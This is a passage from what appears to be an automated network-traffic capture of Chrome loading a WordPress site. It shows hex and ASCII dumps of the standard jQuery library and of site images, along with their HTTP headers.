                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC876INData Raw: 37 64 63 33 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 6a 71 75 65 72 79 2d 63 6f 72 65 2c 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 2a 2a 2f 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29
                                                                                                                                                                                                                              Data Ascii: 7dc3/**handles:jquery-core,jquery-migrate**//*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0)
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 76 61 72 20 72 2c 69 2c 6f 3d 28 6e 3d 6e 7c 7c 43 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 75 29 28 69 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 69 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 65 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65
                                                                                                                                                                                                                              Data Ascii: var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 73 2c 73 6f 72 74 3a 6f 65 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 6f 65 2e 73 70 6c 69 63 65 7d 2c 63 65 2e 65 78 74 65 6e 64 3d 63 65 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 75 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6c 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 6c 3d 61 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 73 5d 7c 7c 7b 7d 2c 73 2b 2b 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 76 28 61 29
                                                                                                                                                                                                                              Data Ascii: turn this.prevObject||this.constructor()},push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||v(a)
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 73 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 73 65 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 69 73 58 4d 4c 44 6f 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 6c 2e 74 65 73 74 28 74 7c 7c 6e 26 26 6e 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 48 54 4d 4c 22 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e
                                                                                                                                                                                                                              Data Ascii: =typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!l.test(t||n&&n.nodeName||"HTML")},merge:function(e,t){for(var n=+t.len
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 2c 6f 2c 61 2c 54 2c 72 2c 43 2c 64 2c 69 2c 6b 3d 6d 65 2c 53 3d 63 65 2e 65 78 70 61 6e 64 6f 2c 45 3d 30 2c 6e 3d 30 2c 73 3d 57 28 29 2c 63 3d 57 28 29 2c 75 3d 57 28 29 2c 68 3d 57 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 61 3d 21 30 29 2c 30 7d 2c 66 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 74 3d 22 28 3f 3a 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31
                                                                                                                                                                                                                              Data Ascii: ,o,a,T,r,C,d,i,k=me,S=ce.expando,E=0,n=0,s=W(),c=W(),u=W(),h=W(),l=function(e,t){return e===t&&(a=!0),0},f="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",t="(?:\\\\[\\da-fA-F]{1
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 4d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 56 28 29 7d 2c 52 3d 4a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 66 65 28 65 2c 22 66 69 65 6c 64 73 65 74 22 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 6b 2e 61 70 70 6c 79 28 6f 65 3d 61 65 2e 63 61 6c 6c 28 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 79
                                                                                                                                                                                                                              Data Ascii: slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},M=function(){V()},R=J(function(e){return!0===e.disabled&&fe(e,"fieldset")},{dir:"parentNode",next:"legend"});try{k.apply(oe=ae.call(ye.childNodes),y
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 76 61 72 20 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69
                                                                                                                                                                                                                              Data Ascii: n e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function F(e){return e[S]=!0,e}function $(e){var t=T.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}functi
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 63 74 6f 72 41 6c 6c 28 22 3a 73 63 6f 70 65 22 29 7d 29 2c 6c 65 2e 63 73 73 48 61 73 3d 24 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 54 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 3a 68 61 73 28 2a 2c 3a 6a 71 66 61 6b 65 29 22 29 2c 21 31 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 30 7d 7d 29 2c 6c 65 2e 67 65 74 42 79 49 64 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65
                                                                                                                                                                                                                              Data Ascii: ctorAll(":scope")}),le.cssHas=$(function(){try{return T.querySelector(":has(*,:jqfake)"),!1}catch(e){return!0}}),le.getById?(b.filter.ID=function(e){var t=e.replace(O,P);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("unde
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 64 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 28 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 64 2e 70 75 73 68 28 22 3a 65 6e 61
                                                                                                                                                                                                                              Data Ascii: .#.+[+~]"),e.querySelectorAll(":checked").length||d.push(":checked"),(t=T.createElement("input")).setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),r.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&d.push(":ena
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 2c 21 43 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 7d 2c 49 2e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 53 79 6e 74 61 78 20 65 72 72 6f 72 2c 20 75 6e 72 65 63 6f 67 6e 69 7a 65 64 20 65 78 70 72 65 73 73 69 6f 6e 3a 20 22 2b 65 29 7d 2c 63 65 2e 75 6e 69 71 75 65 53 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 5b 5d 2c 72 3d 30 2c 69 3d 30 3b 69 66 28 61 3d 21 6c 65 2e 73 6f 72 74 53 74 61 62 6c 65 2c 6f 3d 21 6c 65 2e 73 6f 72 74 53 74 61 62 6c 65 26 26 61 65 2e 63 61 6c 6c 28 65 2c 30 29 2c 64 65 2e 63 61 6c 6c 28 65 2c 6c 29 2c 61 29 7b 77 68 69 6c 65 28 74 3d 65 5b
                                                                                                                                                                                                                              Data Ascii: ,!C):void 0;return void 0!==r?r:e.getAttribute(t)},I.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},ce.uniqueSort=function(e){var t,n=[],r=0,i=0;if(a=!le.sortStable,o=!le.sortStable&&ae.call(e,0),de.call(e,l),a){while(t=e[


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              19192.168.2.649743141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC608OUTGET /wp-content/uploads/2020/11/logo.png HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                              Content-Length: 7236
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                              Cf-Polished: origFmt=png, origSize=8495
                                                                                                                                                                                                                              Content-Disposition: inline; filename="logo.webp"
                                                                                                                                                                                                                              ETag: "64d51142-212f"
                                                                                                                                                                                                                              Last-Modified: Thu, 10 Aug 2023 16:33:06 GMT
                                                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614814
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5afcced4666-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC837INData Raw: 52 49 46 46 3c 1c 00 00 57 45 42 50 56 50 38 4c 30 1c 00 00 2f d7 c3 5b 10 e7 e4 a8 91 24 47 aa ac ea f5 58 96 3f 88 7d 1f 83 83 e0 bd bf a3 e0 2a 92 6c 57 99 39 81 8c 0c fc 5b 40 00 66 32 5f ef 1e 57 91 64 bb ca ec 9e f7 1e 59 02 9f 18 43 2c 2a d0 91 4f 80 5c 5b db f1 ea 8d 9d 7c 88 6d a3 08 73 94 22 32 4c 27 e9 21 35 38 45 d8 ba 1a d9 d6 77 bf 75 10 c0 cc 9d 0b 9e 05 4f 7f d4 15 10 a0 3f 04 ba 66 fd e0 fe bf 00 6a d9 b9 c5 bb d8 41 9f 3b 30 7a 17 14 cf 93 b5 29 8f 8d 32 86 65 e4 bb d8 41 1f 3b b0 76 1b 3b a2 6d c6 16 6b 53 0c 43 34 05 8d ee cc 55 70 12 95 04 25 8c 89 24 25 68 09 ae 63 20 90 5e b0 34 c6 d6 97 46 c4 1a 81 28 40 d0 08 c4 80 3b d0 ad 60 87 22 82 a0 80 80 98 e0 de fa 0f 84 81 7f 01 b9 83 d0 e8 4f ea de 58 63 c4 ac d5 02 01 88 21 5c 88 03 bc
                                                                                                                                                                                                                              Data Ascii: RIFF<WEBPVP8L0/[$GX?}*lW9[@f2_WdYC,*O\[|ms"2L'!58EwuO?fjA;0z)2eA;v;mkSC4Up%$%hc ^4F(@;`"OXc!\
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: ad e9 66 25 80 73 f9 0d 47 67 e1 40 7e 42 26 ce 39 3a 0c 84 9f 6a 2d 72 27 45 b0 37 25 5f 12 4e 2a 60 70 e2 ce 2a 3b ba 0e 37 00 7b 10 dd 47 80 74 a7 a2 eb b4 06 28 07 b0 dd 4b e7 3b 15 c1 b9 57 2b 02 06 cb d9 f7 d6 05 39 30 1e 33 d0 d9 5e 3f be 48 f0 db 9f 09 0a 09 52 1f 13 b2 f3 74 03 4c 73 f8 08 59 4c d3 ec 47 75 bd 2e fc 6e df 6c be fb 24 05 fe 2f da 61 0a e1 ba c6 00 9d a7 ab 99 23 ce 9f 5e b4 3b 65 2c 71 ae 31 c4 a4 ac 0a a1 dd f2 df 91 94 ba 3e 0b 5f b7 d8 08 c9 a7 55 fb 0f ab 9d de ad 10 db 44 cd 31 69 b8 36 f8 c5 0e 1e 3c 51 90 8e a7 ed 79 f9 46 20 6e fd 7f f8 54 cf 57 9c 45 e7 86 fd 4f 33 df e6 47 4f d4 20 08 f3 72 8d f0 db da 67 88 ef ed 56 8f d3 23 4c fa 2c f8 33 72 ab 03 95 1b 72 06 e8 a6 df 8b c3 a6 fa ea 63 d5 b2 d4 48 b2 b7 db cd 4f b4 c0
                                                                                                                                                                                                                              Data Ascii: f%sGg@~B&9:j-r'E7%_N*`p*;7{Gt(K;W+903^?HRtLsYLGu.nl$/a#^;e,q1>_UD1i6<QyF nTWEO3GO rgV#L,3rrcHO
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 1f c7 e1 d2 a5 3d 8f 0f db b7 84 e5 5e bf c1 7d 04 69 f4 63 fb 8e 30 c7 e3 3c dc 9a f3 4b 1e 4f c2 39 5f 9b 5a eb 0b a5 3b d5 1a 5e 58 bc 49 20 0b 1d 79 bd 70 99 f8 c4 48 7e f6 2a 3f 0a e3 f1 25 44 c7 b4 08 05 a3 16 13 d9 d0 78 35 29 d1 12 dd 41 4e 48 4f f1 4f 48 58 ea 16 10 85 cc c7 96 48 2f 90 49 fb 6d a7 b1 83 19 1b 62 8c 8c 29 27 d2 d0 d4 0a f8 5f 71 a0 6a d9 4f 33 c5 fb 64 d3 da 0e 6b 3e 7e e0 24 dc a0 b8 f5 20 cc 69 2e 17 08 21 22 d1 b1 2c 04 9f 50 a4 4c d8 a5 92 2e 13 40 72 3f 26 d5 8f e3 b6 1a c7 e3 4f 28 6e 89 0f 14 c0 1c 8f 9c aa 1e 9c b4 f7 49 66 5d c5 52 57 a8 28 8c 80 65 78 a5 4a 1a 3f fb 5e 61 8a 6c 03 4d 79 c1 cc ad a4 82 78 8a e7 f7 8d 1d 1f 75 dc 26 2d e1 08 4e 23 6a 53 94 d3 88 1b b7 a2 5a d1 81 2c 45 64 bb 4e ae 4c 2c 81 5a 7d 4c a2 d4
                                                                                                                                                                                                                              Data Ascii: =^}ic0<KO9_Z;^XI ypH~*?%Dx5)ANHOOHXH/Imb)'_qjO3dk>~$ i.!",PL.@r?&O(nIf]RW(exJ?^alMyxu&-N#jSZ,EdNL,Z}L
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 4a 4d a1 41 57 f6 96 36 81 3e 1e 77 40 25 43 64 e7 a5 62 73 3f 7b e0 40 e3 26 85 38 d4 9f 8c a1 c4 b0 bd 9d 58 87 de f6 20 62 24 87 8e be 5d 7f 9d f2 e8 60 e1 8c 0f 80 d5 05 2c 65 ea 98 f3 c6 34 8b b4 29 74 9d bf 42 6e 8b 8b fc a2 32 75 88 ce 95 33 4c a9 03 19 b7 02 81 d9 36 a6 77 0f c3 f6 76 7e 62 7c d9 73 b8 1c 1f 57 f4 f7 0e 6f 0a 66 9d 16 0a 0f 7e 4c d6 76 cf 29 fd 46 27 d7 13 17 0b 25 18 ad 95 f6 94 a7 4e 94 ca 85 5f 44 45 a7 e1 96 98 a1 e2 86 80 d9 36 2e 16 10 84 b7 13 e1 51 e0 a0 d7 69 f9 84 b8 5c 23 ad ea 1e f6 83 e0 35 6f 0a 34 7a c9 c5 cb 30 ec 2e 60 9c 25 ea 9c 60 0c c0 c1 d5 1a ba 2e 17 97 b8 82 da f6 b9 22 dc 4c bb 3a d1 56 14 1c ac ab 1d b7 0e 00 d9 36 ae 8c 36 08 ca db 09 ed f2 e1 5e e6 4b ec 8b 4b 53 74 a8 7f 1f de 21 94 8e ef 7e 40 39 9e
                                                                                                                                                                                                                              Data Ascii: JMAW6>w@%Cdbs?{@&8X b$]`,e4)tBn2u3L6wv~b|sWof~Lv)F'%N_DE6.Qi\#5o4z0.`%`."L:V66^KKSt!~@9
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 24 00 a6 fb 8a 40 de b4 88 84 b4 19 d9 3d 3e 8b a7 b7 77 8c 62 74 c9 cb 67 19 9a b1 2c 62 c7 64 d4 1c 40 10 14 d6 84 8e fa b7 b8 22 00 15 b8 73 09 78 90 bc 51 e0 14 fa 6f aa ce a5 49 55 a4 a9 78 d3 ab fc 40 31 52 50 ac ba cd d0 2c 38 65 6a 78 80 b2 2f 53 f5 b6 37 8c f2 0a 34 05 67 48 d4 be 9a f4 d9 95 ef 9d 83 93 9b 7f 70 99 d1 9b de b1 8c d8 4d fc 74 b1 6b 43 13 de 5b c7 f9 32 4f e7 ae a5 8b 13 cf a7 23 f9 8f 25 9e a0 5c 86 46 75 71 4f 00 1a 8a 93 ae 94 db 1a f8 e4 1d 79 c0 35 a6 65 2e af bb a1 c9 cf 3b 7b 61 27 9b b5 a5 d6 bd 1d 84 2e 4e 80 74 52 8d ff b2 ea 55 3a 15 91 e4 3b cb 56 61 31 bd fc 09 2d 46 5b 1c b8 fd 59 9c bc 57 89 83 88 c8 14 60 7d a0 b2 38 e0 0d fd 34 33 fe d1 61 77 ef 61 88 62 b3 a2 99 ba 80 2a af 73 27 94 28 58 0d f7 85 3c 08 35 a2 a4
                                                                                                                                                                                                                              Data Ascii: $@=>wbtg,bd@"sxQoIUx@1RP,8ejx/S74gHpMtkC[2O#%\FuqOy5e.;{a'.NtRU:;Va1-F[YW`}843awab*s'(X<5
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC923INData Raw: 4c 63 15 e7 c7 44 c9 f3 14 6f f3 11 b4 f3 1c 22 1b af 6f 19 cd 7d fb e2 e0 49 e7 5e 2d d4 53 af d5 e0 c0 a9 af 9c 43 15 26 0c b3 86 eb 1f b7 80 13 47 61 2d 95 20 f5 92 ee 56 a6 c2 e4 34 a4 db fe 08 42 f2 07 a6 b7 dc 9a 81 ba e5 c9 eb 91 84 b1 8b 6f f7 b4 8f 9b e5 a6 d6 95 f2 39 85 49 f0 8f f0 48 c2 52 fc a7 83 15 f4 8e 40 9a 8b 80 a2 b2 9d 12 ba 3b 64 d6 76 59 2b 46 6c 5e e4 c9 14 ed 55 f5 6f 35 ef e1 49 d6 2d dd 2c 3a 26 46 b7 0e dd fe d1 d0 eb fd 3a 8c e2 21 07 98 74 cd df cd 28 e1 a7 13 43 d1 d8 aa 19 6f 3e 98 d3 e2 a7 6f 2c 23 52 46 ac d7 c6 27 3d c2 d0 2b b4 c7 92 1c 78 a2 07 2b 30 e1 8a b5 3a 72 cc 16 68 d1 bc 2d 99 3b 43 de 17 8f f7 e2 cb 21 ee 35 0a 5c 45 ef 82 c7 39 61 b0 0d eb 96 c7 cf d9 e5 0c 85 31 56 63 6e 62 14 5e 22 fa 3f 76 46 4b e6 d5 87
                                                                                                                                                                                                                              Data Ascii: LcDo"o}I^-SC&Ga- V4Bo9IHR@;dvY+Fl^Uo5I-,:&F:!t(Co>o,#RF'=+x+0:rh-;C!5\E9a1Vcnb^"?vFK


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              20192.168.2.649745141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC622OUTGET /wp-content/themes/tac-child/images/icon-close.png HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                              Content-Length: 202
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                              Cf-Polished: origFmt=png, origSize=263
                                                                                                                                                                                                                              Content-Disposition: inline; filename="icon-close.webp"
                                                                                                                                                                                                                              ETag: "66f56b86-107"
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:11:18 GMT
                                                                                                                                                                                                                              Vary: Accept
